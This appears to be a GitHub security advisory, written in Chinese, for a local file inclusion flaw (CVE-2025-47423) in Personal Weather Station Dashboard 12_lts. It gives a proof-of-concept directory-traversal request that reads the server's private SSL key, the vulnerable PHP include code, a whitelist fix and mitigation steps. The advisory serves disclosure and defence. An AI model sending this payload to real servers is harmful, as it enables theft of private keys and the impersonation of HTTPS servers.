Haluka92/CVE-2025-47423

GitHub: Haluka92/CVE-2025-47423

该项目是针对 Personal Weather Station Dashboard 中本地文件包含漏洞(CVE-2025-47423)的安全披露报告,包含漏洞分析和修复方案。

Stars: 0 | Forks: 0

# CVE-2025-47423 – Personal Weather Station Dashboard (12_lts) 中的本地文件包含漏洞 **发现者:** Matthew Eagle **状态:** 公开披露 **报告日期:** 2025-05-05 **CVE ID:** CVE-2025-47423 ## 🧩 摘要 `Personal Weather Station Dashboard` 版本 `12_lts` 中存在一个本地文件包含 (LFI) 漏洞,允许未经身份验证的远程攻击者读取服务器上的任意文件。利用此漏洞可以访问敏感文件(包括私有 SSL 密钥),这可能会危及 HTTPS 连接的机密性和完整性。 ## 🛠 受影响组件 - 文件:`/others/_test.php` - 存在漏洞的参数:`test` (通过 GET 请求) ## 📈 影响 此漏洞允许远程攻击者: - 读取文件系统上的任意文件 - 泄露私有 SSL 密钥(例如 `server.key`) - 发起中间人 (MITM) 攻击 - 伪装成 HTTPS 服务器 **CVSS**:5.8 中危 ## 💥 概念验证 (PoC) ``` GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1 Host: www.example.com ``` 响应: ``` -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAs2omMqKSB+lm7xu9Nu3C5... ...TRUNCATED... -----END RSA PRIVATE KEY----- ``` ## 🧪 存在漏洞的代码(简化版) ``` $script = trim($_GET['test']); $script = str_replace('../','',$script); include($script); ``` `str_replace` 不足以防止目录遍历。 ## 🔐 安全修复 - 对包含目标使用严格的白名单机制 - 使用 `basename()` 对输入进行过滤,并与允许的文件列表进行核对 - 避免基于用户输入进行动态包含 ``` $allowed_tests = ['index.php', 'module_test.php']; $script = isset($_GET['test']) ? basename($_GET['test']) : 'index.php'; if (!in_array($script, $allowed_tests)) { die("Invalid test file."); } include(__DIR__ . '/scripts/' . $script); ``` ## 📅 时间线 | 日期 | 事件 | |-------------|-------| | 2025-05-05 | 向 PWS Dashboard 维护者报告漏洞 | | 2025-05-06 | 确认漏洞并进行测试 | | 2025-05-07 | 通过 MITRE 预留 CVE-2025-47423 | | 待定 | 等待公开补丁和 CVE 列出 | ## 🧠 缓解措施 如果您正在运行 `Personal Weather Station Dashboard 12_lts`,您应该: - 立即删除或更新 `_test.php` - 实施带有文件白名单机制的修复脚本 - 轮换并重新签发任何已泄露的 TLS 证书 ## 🧾 参考 - [MITRE 上的 CVE-2025-47423 (待定)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-47423) - [发布在 GitHub 上的安全通告](https://github.com/haluka92/CVE-2025-47423) ## 🙏 致谢 该漏洞由 **Matthew Eagle** 发现并负责任地披露 联系方式:[meagle2006@gmail.com](mailto:meagle2006@gmail.com) _本次披露遵循负责任的披露准则。发布此文档仅出于教育和防御目的。_
标签:HTTP工具, OpenVAS, PHP, PoC, Web安全, 暴力破解, 本地文件包含, 漏洞披露, 蓝队分析